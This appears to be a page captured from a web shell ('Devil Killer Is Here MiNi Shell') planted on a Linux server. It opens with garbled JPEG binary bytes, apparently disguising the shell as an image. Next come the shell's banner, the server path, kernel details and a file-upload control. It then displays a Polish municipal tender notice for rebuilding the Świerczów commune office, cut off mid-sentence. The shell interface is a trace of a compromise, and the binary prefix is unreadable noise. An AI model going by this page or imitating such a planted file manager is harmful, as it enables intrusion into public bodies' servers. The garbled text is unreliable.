JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220124/0003278002-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Obiekt: Rozbudowa z przebudową budynku Urzędu Gminy<br/>Zadanie: „Termomodernizacja budynku Urzędu Gminy w Świerczowie wraz z budową dźwigu osobowego – rozbudowa budynku” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Świerczów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531412757</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brzeska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świerczów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-112</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL523 - Nyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774196170</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug_rolnictwo@swierczow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.swierczow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Obiekt: Rozbudowa z przebudową budynku Urzędu Gminy<br/>Zadanie: „Termomodernizacja budynku Urzędu Gminy w Świerczowie wraz z budową dźwigu osobowego – rozbudowa budynku” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c8056ba5-7d1b-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00032780</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00012159/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Obiekt: Rozbudowa z przebudową budynku Urzędu Gminy Zadanie: „Termomodernizacja budynku Urzędu Gminy w Świerczowie wraz z budową dźwigu osobowego – rozbudowa budynku”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).Maksymalny rozmiar plików<br/>przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna RODO dot. przetwarzania danych<br/>osobowych na podstawie obowiązku prawnego ciążącego na administratorze:1) TOŻSAMOŚĆ<br/>ADMINISTRATORA: Administratorem danych osobowych Wykonawcy przetwarzanych w Urzędzie<br/>Gminy Świerczów, REGON: 000543829 jest: Wójt Gminy Świerczów ul. Brzeska 48, 46-112<br/>Świerczów. Z administratorem można skontaktować się pisemnie - kierując korespondencję na adres siedziby administratora.2) DANE KONTAKTOWE INSPEKTORA OCHRONY DANYCH: Administrator<br/>wyznaczył Inspektora Ochrony Danych Osobowych, z którym kontakt jest możliwy pisemnie na adres<br/>siedziby Administratora, pod numerem tel.: 887818800 lub poprzez e-mail:<br/>biuro@centrumcyfryzacji.pl;3) CELE PRZETWARZANIA I PODSTAWA PRAWNA: Dane Wykonawcy<br/>będą przetwarzane w celu zawarcia i realizacji umowy cywilno-prawnej w zakresie określonym<br/>obowiązującymi przepisami, w tymi przepisami prawa cywilnego; w zakresie wypełniania obowiązków<br/>prawnych ciążących na administratorze na podstawie powszechnie obowiązujących przepisów prawa;<br/>w zakresie gdzie przetwarzanie danych osobowych jest niezbędne do wykonania przez Administratora<br/>celów kontaktowych oraz realizacji praw i obowiązków podmiotów realizujących umowy cywilnoprawne<br/>w ramach, których następuje przekazanie danych osobowych, jak również w celu ustalenia lub<br/>dochodzenia roszczeń lub w celu obrony przed roszczeniami i celach archiwizacyjnych - art. 6 ust. 1 lit.<br/>b, c oraz f RODO.4) ODBIORCY DANYCH: Dane osobowe przekazane w umowach cywilnoprawnych<br/>mogą być udostępniane upoważnionym pracownikom Administratora, członkom organów<br/>Administratora, podmiotom dostarczającym lub utrzymującym infrastrukturę IT Administratora,<br/>podmiotom i osobom świadczącym na rzecz Administratora usługi ubezpieczeniowe, usługi prawne<br/>oraz innym podmiotom, którym Administrator w celu wykonywania praw i obowiązków wynikających z<br/>zawartych umów cywilnoprawnych powierzył dane osobowe (procesorom), a także organom<br/>uprawnionym do otrzymywania danych osobowych na podstawie przepisów prawa. Dane osobowe<br/>Wykonawcy mogą być przekazane wyłącznie podmiotom, które uprawnione są do ich otrzymania<br/>przepisami prawa oraz podmiotom realizującym usługi w imieniu i na rzecz Administratora w zakresie<br/>niezbędnym dla prawidłowego funkcjonowania.5) OKRES PRZECHOWYWANIA DANYCH: Dane<br/>przetwarzane będą przez okres trwania umowy, jak również przez okres trwania wymagalności<br/>ewentualnych roszczeń, zgodnie z art. 118 Ustawy z dnia 23 kwietnia 1964 r. - Kodeks cywilny (Dz.U.<br/>2019 poz. 1145), a po tym czasie przez okres wymagany przez przepisy powszechnie obowiązującego<br/>prawa, w tym w zakresie archiwizacji.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">6) PRAWA PODMIOTÓW DANYCH: Posiada Pani/Pan<br/>prawo dostępu do treści danych oraz prawo ich sprostowania, usunięcia, ograniczenia przetwarzania,<br/>prawo do przenoszenia danych, prawo wniesienia sprzeciwu, prawo do cofnięcia zgody (jeżeli<br/>przetwarzanie odbywa się na podstawie zgody) w dowolnym momencie bez wpływu na zgodność z<br/>prawem przetwarzania, którego dokonano na podstawie zgody przed jej cofnięciem. Wszystkie<br/>wymienione prawa wymagają pisemnej formy.7) PRAWO WNIESIENIA SKARGI DO ORGANU<br/>NADZORCZEGO: Wykonawcy przysługuje prawo wniesienia skargi do organu nadzorczego<br/>zajmującego się ochroną danych osobowych w państwie członkowskim Pani/Pana zwykłego pobytu,<br/>miejsca pracy lub miejsca popełnienia domniemanego naruszenia. Biuro Prezesa Urzędu Ochrony<br/>Danych Osobowych (PUODO) Adres: ul. Stawki 2, 00-193 Warszawa, Telefon: 22 531 03 00.8)<br/>ŹRÓDŁO POCHODZENIA DANYCH OSOBOWYCH: Dane pochodzą od osób których dane dotyczą i<br/>zostały udostępnione na podstawie zawartej umowy cywilno-prawnej.9) INFORMACJA O<br/>DOWOLNOŚCI LUB OBOWIĄZKU PODANIA DANYCH: Podanie danych osobowych jest warunkiem<br/>niezbędnym do zawarcia umowy cywilno-prawnej. W przypadku nie podania danych osobowych nie<br/>będzie możliwe jej zawarcie.10) PRZEKAZANIE DANYCH OSOBOWYCH DO PAŃSTWA<br/>TRZECIEGO LUB ORGANIZACJI MIĘDZYNARODOWEJ: Może wystąpić, jeżeli wystąpi o to państwo<br/>trzecie lub organizacja międzynarodowa, jednak po wykazaniu zgodności z przepisami RODO.11)<br/>INFORMACJE O ZAUTOMATYZOWANYM PODEJMOWANIU DECYZJI, W TYM O PROFILOWANIU:<br/>Pani/Pana dane mogą być przetwarzane w sposób zautomatyzowany i nie będą profilowane.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIM.271.01.2022.MH</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Istniejący obiekt będący siedzibą Urzędu Gminy jest obiektem dwukondygnacyjnym i częściowo podpiwniczonym. Obiekt pochodzący sprzed 1945 r wykonany w technologii tradycyjnej posiada ściany murowane z cegły ceramicznej, strop nad piwnica odcinkowy na belkach stalowych ,nad parterem drewniany, nad I piętrem w części zachodniej pod dachem stromym strop drewniany, w części wschodniej (płaskiej betonowy). Pokrycie w części wschodniej stropodach kryty papą z izolacją termiczną nie udokumentowaną, w części poddasza wysokiego dach o konstrukcji drewnianej kryty dachówką cementową. Wejście na poddasze i dach przez właz na I p po rozkładanych schodach. Elewacja w częściach docieplona styropianem o przeciętnej grubości 5 cm.<br/>Występujące instalacje: wod.-kan., elektryczna, informatyczna, CO zasilane z zewnątrz.<br/>Zakres przebudowy:<br/>a)	przebudowa stropodachu w wykonaniem więźby dachowej drewnianej w części stropodachu płaskiego i wykonanie pokrycia blachą dachówkową, w części wysokiej (dach stromy) wymiana pokrycie na blachę dachówkową. Stropodach w całości docieplony wełną mineralną grubości 20 cm. Strop poddasza dodatkowo obudowany płytami cementowo-wiórowe zwiększającymi odporność na ogień. Na poddaszu wysokim umiejscowiona będzie centrala wentylacyjna oparta na 2 belkach stalowych HEB 120. Należy przebudować właz na dach w części wysokiej poddasza.<br/>b)	strop nad parterem i Ip pod dachem wysokim należy przebudować dla uzyskania odporności ogniowej EI, wg układu warstw jak na rysunkach. Istniejące schody łączące parter piętro i część stropu należy rozebrać i w tym miejscu wykonać strop na belkach stalowych. Po odkryciu belek stropowych należy je wzmocnić w zależności od ich stanu technicznego po uzgodnieniu z inspektorem nadzoru. <br/>c)	istniejące posadzki podlegają rozbiórce i wykonane w nowym układzie, na parterze pod posadzkami ułożona izolacja termiczna ze styropianu grub. 20cm na gruncie w celu uzyskania izolacyjności termicznej. W pomieszczeniach mokrych i na korytarzach parteru posadzki gres a piętrze na korytarzu i wszystkich pomieszczeniach biurowych wykładzina rulonowa PCV.<br/>d)	istniejące okna drewniane należy wymienić na nowe o wymiarach i kształcie jak istniejące, a od strony granicy z sąsiadem okna o odporności ogniowej EI 60 zaznaczone na rzutach.<br/>e)	wszystkie drzwi wewnętrzne wymienić na nowe o wymaganej szerokości w świetle ościeżnic 90 cm<br/>f)	ściany i ścianki należy przebudować w nowym układzie do komunikacji w nowej klatce schodowej z dźwigiem osobowym.<br/>g)	docieplenie ścian zewnętrznych wykonać stosując wełnę mineralną grub. 20 cm i wyprawę cienkowarstwową silikonową z dodatkiem antyglonowym. Istniejące docieplenie ze styropianu należy usunąć przed ułożeniem nowego z wełny mineralnej<br/> <br/> KLATKA SCHODOWA<br/><br/>usytuowana od strony północnej budynku istniejącego mieści dźwig osobowy oraz schody o wymiarach zgodnych z warunkami technicznymi. Konstrukcja klatki schodowej:<br/>· fundamenty w postaci ław betonowych zbrojonych podłużnie, ława wschodnia w układzie<br/>schodkowym nawiązuje do fundamentów części podpiwniczonej budynku istniejącego<br/>· ściany fundamentowe z bloczków betonowych M-6 na zaprawie cementowej<br/>· ściany dźwigu osobowego z cegły pełnej kl. 15 na zaprawie cementowej, dźwig osobowy o dwóch przystankach, napędzie hydraulicznym i udźwigu 450 kg, prędkość nominalna 0,52-0,62 m/s, szerokość drzwi teleskopowych 0,90 m<br/>· ściany zewnętrzne z pustaków ceramicznych<br/>· stropy i schody monolityczne żelbetowe<br/>· konstrukcja dachu drewniana więźba z pokryciem blachą dachówkową<br/>· docieplenia stropu i ścian zewnętrznych z wełny mineralnej<br/>· docieplenie posadzki na gruncie ze styropianu<br/>· stolarka drzwiowa oddzielająca klatkę schodową od pozostałych części o klasie EI 30<br/>· posadzki z płytek gres o dużej odporności na ścieranie<br/><br/> SALA KONFERENCYJNA - SALA ŚLUBÓW<br/><br/>położona od strony północnej klatki schodowej jest częścią parterową niepodpiwniczoną ze stropodachem na<br/>drewnianych wiązarach kratowych.<br/>·	fundamenty w postaci ław żelbetowych<br/>·	mury fundamentowe z bloczków betonowych M-6<br/>·	ściany zewnętrzne z pustaków ceramicznych zakończone wieńcem żelbetowym <br/>·	stropodach z sufitem podwieszonym do wiązarów kratowych ocieplony wełną mineralną 20 cm, pokrycie blachą dachówkową<br/>·	posadzka z klepki dębowej na leju w układzie warstw jak na rysunkach przekroju<br/>·	stolarka okienna PCV, drzwi wejściowe aluminiowe w kolorze stolarki<br/>·	schody zewnętrzne betonowe z wykończeniem płytkami klinkierowymi nad schodami daszek ochronny o konstrukcji drewnianej<br/><br/>POCHYLNIA DLA OSÓB NIEPEŁNOSPRAWNYCH<br/><br/>usytuowana przed wejściem do klatki schodowej wykonana z bloczków betonowych i nawierzchni z kostki betonowej grub. 6 cm. Balustrady stalowe o wymiarach zgodnych z WT.<br/><br/>Instalacje sanitarna i elektryczna:<br/>Projektowana rozbudowa obejmuje roboty w części rozbudowywanej i przebudowywanej:<br/>· roboty demontażowe<br/>· montaż instalacji wody i kanalizacji sanitarnej wraz z przystosowaniem sanitariatu dla niepełnosprawnych<br/>· montaż instalacji centralnego ogrzewania niskotemperaturowego z elementami grzejnymi w postaci grzejników i ogrzewania podłogowego zasilanego z pompy ciepła z dolnym źródłem w postaci sond gruntowych o głębokości do 100m.<br/>· montaż instalacji wentylacji i klimatyzacji z odzyskiem ciepła. Budynek wymianę ciepła ma zorganizowaną w całości za pomocą wentylacji mechanicznej z dwoma jednostkami centralnymi obsługującymi w podziale na istniejący i nowy. Podział z uwagi na charakter użytkowania obiektu.<br/>· montaż instalacji elektrycznej z oszczędnym źródłem ciepła w postaci oświetlenia LED, dostosowaniem zabezpieczeń ewakuacji i zastosowaniem fotowoltaiki.<br/><br/>Szczegółowy zakres robót oraz sposób ich wykonania określony jest w dokumentacji projektowej, przedmiarach robót oraz specyfikacjach technicznego wykonania i odbioru robót budowlanych opracowanymi dla potrzeb niniejszego zamówienia stanowiącymi załącznik nr 7 do niniejszej specyfikacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45261100-5 - Wykonywanie konstrukcji dachowych</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45262210-6 - Fundamentowanie</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45262522-6 - Roboty murarskie</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421120-1 - Instalowanie progów</p> <p class="mb-0">45432120-1 - Instalowanie nawierzchni podłogowych</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający udzieli zamówienia Wykonawcy, którego<br/>ofertaodpowiadawszystkim wymaganiom przedstawionym w SWZ i została oceniona jako<br/>najkorzystniejsza,tj. uzyskaław sumie największą ilość punktów na podstawie przyjętych kryteriów<br/>oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1.1.	nie podlegają wykluczeniu,<br/>1.2. spełniają warunki udziału w postępowaniu określone przez Zamawiającego. <br/><br/>2. Warunki udziału w postępowaniu:<br/><br/>2.1. Zdolność do występowania w obrocie gospodarczym <br/>ZAMAWIAJĄCY NIE STAWIA WARUNKU W TYM ZAKRESIE.<br/><br/>2.2. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>ZAMAWIAJĄCY NIE STAWIA WARUNKU W TYM ZAKRESIE.<br/><br/><br/>2.3. Sytuacja ekonomiczna lub finansowa.<br/>ZAMAWIAJĄCY NIE STAWIA WARUNKU W TYM ZAKRESIE.<br/><br/>2.4. Zdolność techniczna lub zawodowa – o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że:<br/>1) Wykonawca musi wykazać udokumentowane należyte wykonanie, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo zrealizował (zakończył): - co najmniej jedno zadanie polegające na remoncie, odbudowie lub przebudowie obiektu kubaturowego na kwotę min. 1 000 000,00 zł brutto (słownie: jeden milion złotych); <br/>W przypadku wspólnego ubiegania się Wykonawców o udzielenie niniejszego zamówienia, Wykonawcy mogą wykazać, że łącznie spełniają powyższy warunek. <br/>2) Wykonawca wykaże, że dysponuje osobami, którym zostanie powierzone wykonanie niniejszego zamówienia, na stanowiskach wymienionych poniżej: <br/>a) Kierownik z uprawnieniami konstrukcyjno - budowlanymi, posiadający uprawnienia do kierowania robotami budowlanymi w zakresie obejmującym przedmiot zamówienia. <br/>UWAGA: <br/>− Kierownik budowy/robót powinien posiadać uprawnienia budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (Dz. U. z 2017 r. poz. 1332 z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r. poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. <br/>− Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65). <br/>Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia mogą wykazać, że łącznie spełniają 